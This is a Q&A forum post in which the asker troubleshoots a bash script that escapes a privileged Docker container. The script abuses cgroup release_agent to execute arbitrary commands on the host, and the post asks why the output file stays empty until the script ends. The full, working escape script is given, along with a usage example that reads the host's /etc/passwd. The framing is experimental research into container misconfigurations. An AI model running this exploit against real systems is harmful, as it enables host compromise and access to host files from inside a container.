# File changes made during execution of shell script on overlay filesystem are not visible before the shell script exits?

Tags: bash, debian, security, cgroups, container

I have been experimenting with Docker and how some of the options of `docker run ...`, e.g. `--privileged`, may be abused for container-to-host escapes.

The following `cgroup_escape.sh` script abuses the fact that `--privileged` yields `cap_sys_admin`, which lets the container modify cgroups and use the `release_agent` cgroup feature to execute commands on the host (see **usage**).

The **problem** is that `cat /o` doesn't show any output, when called inside `cgroup_escape.sh`, since the file size of `/o` is 0 bytes until the script exists (`sleep  10` doesn't fix the result). After the script exists, `cat /o` successfully displays the content of `/o`.

The root filesystem of a Docker container has type `overlay`:

```
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/O2KKX7BVYQPVTDYSEHBQGQFRHH:/var/lib/docker/overlay2/l/RGMSFCJWYRAJ3ZUF43IBFJ7UPZ,upperdir=/var/lib/docker/overlay2/9fd70400d50e1cdec022582ce7d0ebdc14db0f31385aa7317e2008770f94b8cf/diff,workdir=/var/lib/docker/overlay2/9fd70400d50e1cdec022582ce7d0ebdc14db0f31385aa7317e2008770f94b8cf/work)
```

Is there a way to make the file changes to `/o` take effect, while the shell script executes?

NB: Is this issue due to the filesystem having type `overlay`?

**cgroup_escape.sh**:

```
#!/usr/bin/env bash

d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/w
echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
touch /o
echo $t/c > $d/release_agent
echo -e "#!/bin/sh\n$1 > $t/o" > /c
chmod +x /c
echo 0 > $d/w/cgroup.procs
sleep 1
cat /o
```

**usage**:

```
docker run --privileged -ti --rm --mount type=bind,src=$(pwd),dst=/host,readonly debian:latest

root@bfbd3ddb2f2b:/# /host/cgroup_escape.sh "cat /etc/passwd"
root@bfbd3ddb2f2b:/# cat /o
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```

Comment: No, it's due to buffering of `cat`'s `STDOUT`. Nothing comes out of `cat` until a buffer fills, or `cat` exits.

Comment: @waltinator - I don’t think you are right. If I inserted a command under `cat /o`, I saw no output either, as I recall. Do you have other ways of fixing this?